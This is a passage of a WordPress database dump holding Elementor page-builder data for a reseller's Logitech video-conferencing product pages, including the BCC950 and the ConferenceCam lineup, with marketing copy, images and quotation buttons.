Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"cfcc955\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(5751,2980,'_elementor_version','0.4'),(5781,2985,'_wp_page_template','template-fullwidth.php'),(5782,2985,'_elementor_edit_mode','builder'),(5759,2972,'_elementor_version','0.4'),(5761,2982,'_wp_page_template','template-fullwidth.php'),(5762,2982,'_elementor_edit_mode','builder'),(5763,2982,'_elementor_template_type','post'),(5764,2982,'_elementor_data','[{\"id\":\"e67c766\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca10afa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8f36e2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>BCC950<\\/p><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p><ul><li>All-in-one design is easy to use and saves space<\\/li><li>Plug-and-play convenience for Windows and Mac<\\/li><li>Clear HD video and audio at an affordable price<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1e36051\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7980e42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-1.png\",\"id\":2974},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4249efb\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff0e7b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"681793a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A GREAT VALUE FOR SMALL TEAMS<\\/h2><p>Small teams can run their own video conferences anytime, anywhere. The all-in-one BCC950 video conferencing system, with its high-definition, plug-and-play webcam and speakerphone, is ideal for small rooms or teams of 1-4 people. Set it up quickly and easily at an office desk or on a conference table. HD video and crystal-clear audio combine high quality with high value.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34e1294\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f991f7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9e7d04\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ce7881c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8b6f6ea\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"85c89bd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950.jpg\",\"id\":2975}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a65f538\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7322827\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ALL-IN-ONE DESIGN<\\/h3><p>Just plug and play. BCC950 delivers wideband audio from a full duplex speakerphone and HD video from a motorised camera. In other words, it\\u2019s everything you need to conduct a small video conference with up to 4 people in one room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8a2fe\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae55cf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"145fac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR PRODUCTIVE TEAMS<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">With a compact footprint and motorised eye-level camera, BCC950 is designed with small groups in mind. An omni-directional speaker and noise-cancelling microphone allow all meeting members to clearly hear and be heard up to 8 feet away. BCC950 is designed for use in private offices, home offices, or virtually any semi-private space.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"92590fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bcf04ec\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-1.jpg\",\"id\":2976}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"39d591c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9b4c8a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"75f8cc3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-2.jpg\",\"id\":2977}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"46d9b0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5237705\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SEE EYE-TO-EYE<\\/h3><p>Eye contact helps you make better connections, especially when you need to establish a new relationship, support a client, or collaborate with a distributed team. Thanks to a motorised camera and innovative extender stem, BCC950 makes video conferencing feel easy and natural.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f49d7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"57a53a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b1aa83\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"046b82f\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"1fcc22a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04cd561\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>NATURAL SOUND<\\/h4><p><span style=\\\"font-size: 0.875rem;\\\">With acoustic echo cancellation and noise canceling technology, BCC950 suppresses distracting background noises and annoying echo so voices sound clear and natural. Enjoy room-filling sound from the full-range speaker, or plug in your earbuds for privacy.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ed104d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"65eb196\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>HANDHELD REMOTE CONTROL<\\/h4><p>Control BCC950\\u2019s camera and audio on the speakerphone or from across the room with the handheld remote control. Either way, that all-important mute button stays in easy reach.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7389e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b70d46b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>USB PLUG-AND-PLAY CONNECTIVITY<\\/h4><p>With no special software, training, or maintenance required, videoconferencing has never been easier. There\\u2019s nothing to configure or install: simply plug BCC950 into your PC or Mac and join your meeting.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0f58cd2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e316d80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>QUALITY OPTICS<\\/h4><p>BCC950 features quality optics so you enjoy bright, clear video with accurate color rendition and sharpness. Pan 180\\u00b0 across the room, and zoom in up to 1.2x in HD or 4x in SD to focus on the details.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"15bb0bc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1097234\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"05b1de0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5765,2982,'_elementor_version','0.4'),(5768,2983,'_wp_page_template','template-fullwidth.php'),(5769,2983,'_elementor_edit_mode','builder'),(5770,2983,'_elementor_template_type','post'),(5771,2983,'_elementor_data','[{\"id\":\"e67c766\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ca10afa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"8f36e2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>BCC950<\\/h2><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p><ul><li>All-in-one design is easy to use and saves space<\\/li><li>Plug-and-play convenience for Windows and Mac<\\/li><li>Clear HD video and audio at an affordable price<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1e36051\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7980e42\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-1.png\",\"id\":2974},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4249efb\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ff0e7b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"681793a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>A GREAT VALUE FOR SMALL TEAMS<\\/h2><p>Small teams can run their own video conferences anytime, anywhere. The all-in-one BCC950 video conferencing system, with its high-definition, plug-and-play webcam and speakerphone, is ideal for small rooms or teams of 1-4 people. Set it up quickly and easily at an office desk or on a conference table. HD video and crystal-clear audio combine high quality with high value.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34e1294\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f991f7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9e7d04\",\"elType\":\"widget\",\"settings\":{\"title\":\"KEY FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ce7881c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"8b6f6ea\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"85c89bd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950.jpg\",\"id\":2975}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a65f538\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7322827\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>ALL-IN-ONE DESIGN<\\/h3><p>Just plug and play. BCC950 delivers wideband audio from a full duplex speakerphone and HD video from a motorised camera. In other words, it\\u2019s everything you need to conduct a small video conference with up to 4 people in one room.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8a2fe\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae55cf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"145fac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PERFECT FOR PRODUCTIVE TEAMS<\\/h3><p><span style=\\\"font-size: 0.875rem;\\\">With a compact footprint and motorised eye-level camera, BCC950 is designed with small groups in mind. An omni-directional speaker and noise-cancelling microphone allow all meeting members to clearly hear and be heard up to 8 feet away. BCC950 is designed for use in private offices, home offices, or virtually any semi-private space.<\\/span><\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"92590fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"bcf04ec\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-1.jpg\",\"id\":2976}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"39d591c\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9b4c8a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"75f8cc3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2019\\/03\\/conferencecam-bcc950-2.jpg\",\"id\":2977}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"46d9b0c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"5237705\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>SEE EYE-TO-EYE<\\/h3><p>Eye contact helps you make better connections, especially when you need to establish a new relationship, support a client, or collaborate with a distributed team. Thanks to a motorised camera and innovative extender stem, BCC950 makes video conferencing feel easy and natural.<\\/p>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"16f49d7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"57a53a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5b1aa83\",\"elType\":\"widget\",\"settings\":{\"title\":\"ADDITIONAL FEATURES\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"046b82f\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"1fcc22a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04cd561\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>NATURAL SOUND<\\/h4><p><span style=\\\"font-size: 0.875rem;\\\">With acoustic echo cancellation and noise canceling technology, BCC950 suppresses distracting background noises and annoying echo so voices sound clear and natural. Enjoy room-filling sound from the full-range speaker, or plug in your earbuds for privacy.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ed104d5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"65eb196\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>HANDHELD REMOTE CONTROL<\\/h4><p>Control BCC950\\u2019s camera and audio on the speakerphone or from across the room with the handheld remote control. Either way, that all-important mute button stays in easy reach.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7389e30\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"b70d46b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>USB PLUG-AND-PLAY CONNECTIVITY<\\/h4><p>With no special software, training, or maintenance required, videoconferencing has never been easier. There\\u2019s nothing to configure or install: simply plug BCC950 into your PC or Mac and join your meeting.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0f58cd2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"e316d80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>QUALITY OPTICS<\\/h4><p>BCC950 features quality optics so you enjoy bright, clear video with accurate color rendition and sharpness. Pan 180\\u00b0 across the room, and zoom in up to 1.2x in HD or 4x in SD to focus on the details.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"15bb0bc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1097234\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"05b1de0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>[maxbutton id=\\\"3\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(5772,2983,'_elementor_version','0.4'),(5775,2984,'_wp_page_template','template-fullwidth.php'),(5776,2984,'_elementor_edit_mode','builder'),(5777,2984,'_elementor_template_type','post'),(5778,2984,'_elementor_data','[{\"id\":\"71c39ac\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"e477157\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":38.387,\"content_position\":\"center\"},\"elements\":[{\"id\":\"1e2e480\",\"elType\":\"widget\",\"settings\":{\"title\":\"VIDEO CONFERENCING\\u200b\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"f051e18\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":61.61},\"elements\":[{\"id\":\"5e28b2d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aad4243\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ab857b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3866d6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>CONFERENCE CAMERAS<\\/h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0326f20\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"56b446e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"963d60b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-group.png\",\"id\":1242}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"eeaf14e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>GROUP<\\/h3><p>Video conferencing for mid to large-sized meeting rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c880fed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"7bbbcce\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-group\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1e67209\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8a768bb\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-system-b2b-pdp.png\",\"id\":1249}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"59f66f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally<\\/h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5e9935e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"14b03e7\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-rally\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a473ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"009aa7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/meetup-conference-cam.png\",\"id\":1316},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6572b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>MeetUp<\\/h4><p>All-in-One ConferenceCam with 120\\u00b0 field of view and integrated audio, perfect for small conference and huddle rooms<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ea3deb\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"ca314b4\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-meetup\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2042b97\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2e8e54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1b201c2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-connect.png\",\"id\":1318}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"17f6307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>CONNECT<\\/h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ed3411\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"f0bb209\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-connect\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1a08e65\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93261d2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/conferencecam-bcc950.png\",\"id\":1319}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0e23f40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>BCC950<\\/h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe5fab\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"cd63719\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-bcc950\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"67ffddd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":20},\"elements\":[{\"id\":\"177327c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ptz-pro-2-camera.png\",\"id\":1321}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ff04afc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>PTZ PRO 2<\\/h3><p>HD 1080p video camera with enhanced pan\\/tilt and zoom<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e3ff14a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get Quotation\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/get-quotation-logitech\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"666088c\",\"elType\":\"widget\",\"settings\":{\"text\":\"View\",\"link\":{\"url\":\"https:\\/\\/bintara.com.my\\/logitech-ptz-pro-2\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"md\",\"background_color\":\"#1d8be5\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a021238\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5be05f3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aea13c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"790f00c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/rally-camera-e1544499263206.png\",\"id\":1247}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"322d778\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4>Rally Camera<\\/h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5fe363c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Get 